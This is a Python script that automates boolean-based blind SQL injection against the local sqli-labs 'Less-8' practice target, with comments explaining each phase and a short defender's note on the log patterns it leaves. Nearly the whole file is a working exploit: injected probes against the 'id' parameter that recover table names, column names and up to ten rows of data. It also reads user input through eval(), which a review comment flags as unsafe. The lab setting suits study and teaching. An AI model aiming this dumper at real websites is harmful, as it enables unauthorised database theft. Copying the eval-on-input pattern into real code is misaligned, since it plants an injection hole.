import requests as req
# Boolean-based blind SQL injection walkthrough against the local sqli-labs
# "Less-8" training target. Every probe in this file appends a condition to
# the `id` parameter and uses the substring "You" in the response body as the
# true/false oracle (presumably the lab's success banner — confirm against the
# target page). The only thing it relies on is the target concatenating `id`
# straight into its SQL text; a parameterized query leaves every probe inert.
# Defender's note: inferring a single character costs several sequential GETs
# whose query strings carry `information_schema`, `ascii(substr(` and the
# `--+` terminator — a high-volume, highly regular pattern in access logs.
url="http://127.0.0.1/sqli/Less-8/"
url_o=url  # pristine base URL; every phase rebuilds `url` from it after each request
res=''  # never read anywhere in this file
database_name=''  # only referenced by the disabled phase kept in the string below
k=0  # overwritten by the `for k` loops; their leaked final value doubles as a count
# Disabled earlier phase, kept as a non-executed triple-quoted string: it probed
# length(database()) linearly and then the name with the same binary-search
# oracle. Left byte-for-byte; its labels read "database length is:" (数据库长为)
# and "database name is:" (数据库名为).
'''for i in range(8,100):
id=f"?id=1' and length(database())={i}--+"
url+=id
r=req.get(url=url)
if "You" in r.text:
print("数据库长为:",i)
break
url=url_o
url=url_o
for j in range(1,i+1):
max_num = 128
min_num = 48
while (min_num<=max_num):
mid=(max_num+min_num)//2
print(mid)
id = f"?id=1' and ascii(substr(database(),{j},1))>{mid}--+"
url+=id
r = req.get(url=url)
#print(url)
url=url_o
if "You" in r.text:
min_num=mid+1
else:
max_num=mid
if mid==(min_num+max_num)//2:
break
database_name+=chr(mid)
print(database_name)
url=url_o
print("数据库名为:"+database_name)
url=url_o'''
# Phase 1: count the tables in the current schema and learn each name's length.
# The first probe asks whether a table exists at offset k; the first empty
# offset breaks the loop, so the leaked loop variable `k` is used afterwards as
# the table count (if all 10 offsets are populated the loop never breaks and
# `k` ends at 9). Each length is found by linear search over 1..99.
tablen=[0 for i in range(10)]
for k in range(0,10):
    # existence probe for the table at offset k
    id = f"?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit {k},1))--+"
    url += id
    r = req.get(url=url)
    url = url_o
    if "You" in r.text:
        for i in range(1,100):
            id = f"?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit {k},1))={i}--+"
            url += id
            print('当前语句:'+url)  # "current statement:" — echoes every probe URL
            r = req.get(url=url)
            url = url_o
            if "You" in r.text:
                tablen[k]=i
                break
    else:
        break
for i in range(0,k):
    # "table <n> length is <len>"; printed 1-based here, 0-based in the later listings
    print('表',i+1,'长度为',tablen[i],'\n')
# Phase 2: recover each table name one character at a time. For position j the
# while loop narrows [min_num, max_num] (ASCII 32..128) with
# `ascii(substr(...)) > mid` probes and exits once the midpoint stops moving;
# that final `mid` is taken as the character. Every probe URL is echoed first.
tabname=['' for i in range(10)]
for i in range(0,k):
    for j in range(1,tablen[i]+1):
        max_num = 128
        min_num = 32
        while (min_num <= max_num):
            mid = (max_num + min_num) // 2
            id = f"?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {i},1),{j},1))>{mid}--+"
            url += id
            print('当前语句:'+url)  # "current statement:"
            r = req.get(url=url)
            url = url_o
            if "You" in r.text:
                min_num = mid + 1
            else:
                max_num = mid
            if mid == (min_num + max_num) // 2:
                break  # midpoint no longer moves: search has converged on `mid`
        tabname[i]+=chr(mid)
for i in range(0,k):
    print('表',i,'名字为:'+tabname[i])  # "table <i> name is:" — 0-based index
# Interactive: choose which table to enumerate. The indices printed just above
# are 0-based (`tabname[i]`), so the answer is used directly as a list index.
print('请输入要查询的表序号:')  # "enter the index of the table to query:"
# NOTE(review): eval() on raw stdin executes any Python expression typed in;
# int(input()) is the safe replacement and is all the index lookup needs.
tabnum=eval(input())
# Phase 3: same shape as Phase 1, for the columns of the chosen table. The
# recovered table name is interpolated into the probe inside single quotes.
# `k` is again left holding the count of populated offsets (same 10-offset
# limit as Phase 1).
columnlen=[0 for i in range(10)]
for k in range(0,10):
    # existence probe for the column at offset k
    id = f"?id=1' and length((select column_name from information_schema.columns where table_schema=database() and table_name='{tabname[tabnum]}' limit {k},1))--+"
    url += id
    r = req.get(url=url)
    print(url)
    url = url_o
    if "You" in r.text:
        for i in range(1,100):
            id = f"?id=1' and length((select column_name from information_schema.columns where table_schema=database() and table_name='{tabname[tabnum]}' limit {k},1))={i}--+"
            url += id
            print('当前语句:' + url)  # "current statement:"
            r = req.get(url=url)
            url = url_o
            if "You" in r.text:
                columnlen[k]=i
                break
    else:
        break
for i in range(0,k):
    print('字段',i,'长度为',columnlen[i])  # "column <i> length is <len>"
# Phase 4: recover each column name character by character with the same
# binary-search oracle as Phase 2 (ASCII 32..128, stop when the midpoint stops
# moving). Each tried midpoint and each probe URL is echoed to stdout.
columnname=['' for i in range(10)]
for i in range(0,k):
    for j in range(1,columnlen[i]+1):
        max_num = 128
        min_num = 32
        while (min_num <= max_num):
            mid = (max_num + min_num) // 2
            print(mid)
            id = f"?id=1' and ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='{tabname[tabnum]}' limit {i},1),{j},1))>{mid}--+"
            url += id
            print('当前语句:' + url)  # "current statement:"
            r = req.get(url=url)
            url = url_o
            if "You" in r.text:
                min_num = mid + 1
            else:
                max_num = mid
            if mid == (min_num + max_num) // 2:
                break  # search has converged on `mid`
        columnname[i]+=chr(mid)
for i in range(0,k):
    print("字段",i,'名字为',columnname[i])  # "column <i> name is <name>"
# Phase 5: print up to 10 rows of the chosen table, one value per column.
# The table and column names recovered above are interpolated unquoted into
# the data query. Row existence is probed through the first character of the
# first column (`> 1`); each value is then read at positions 1..19, with a
# per-position existence probe (`> 1`) before the binary search, and the
# position loop ends at the first empty position. `metadata` is rebuilt for
# every row, so the module-level initialisation below is immediately replaced.
metadata=['' for i in range(10)]
for i in range(0,k):
    print(columnname[i]+' ',end='')  # header line: column names separated by spaces
print('\n')
for j in range(0,10):
    metadata = ['' for i in range(10)]
    # does row j exist? (first column, first character)
    id = f"?id=1' and ascii(substr((select {columnname[0]} from {tabname[tabnum]} limit {j},1),1,1))>1--+"
    url += id
    r = req.get(url=url)
    url = url_o
    if "You" in r.text:
        for i in range(0, k):
            for n in range(1,20):
                # is there a character at position n of this value?
                id = f"?id=1' and ascii(substr((select {columnname[i]} from {tabname[tabnum]} limit {j},1),{n},1))>1--+"
                url += id
                r = req.get(url=url)
                url = url_o
                if "You" in r.text:
                    max_num = 128
                    min_num = 32
                    while (min_num <= max_num):
                        mid = (max_num + min_num) // 2
                        id = f"?id=1' and ascii(substr((select {columnname[i]} from {tabname[tabnum]} limit {j},1),{n},1))>{mid}--+"
                        url += id
                        r = req.get(url=url)
                        url = url_o
                        if "You" in r.text:
                            min_num = mid + 1
                        else:
                            max_num = mid
                        if mid == (min_num + max_num) // 2:
                            break  # search has converged on `mid`
                else:
                    break  # end of this value
                metadata[i]+=chr(mid)
            print(metadata[i]+' ',end='')
    else:
        break  # no row at offset j: stop paging
    print('\n')
(能用,但不知道改一下会不会出bug)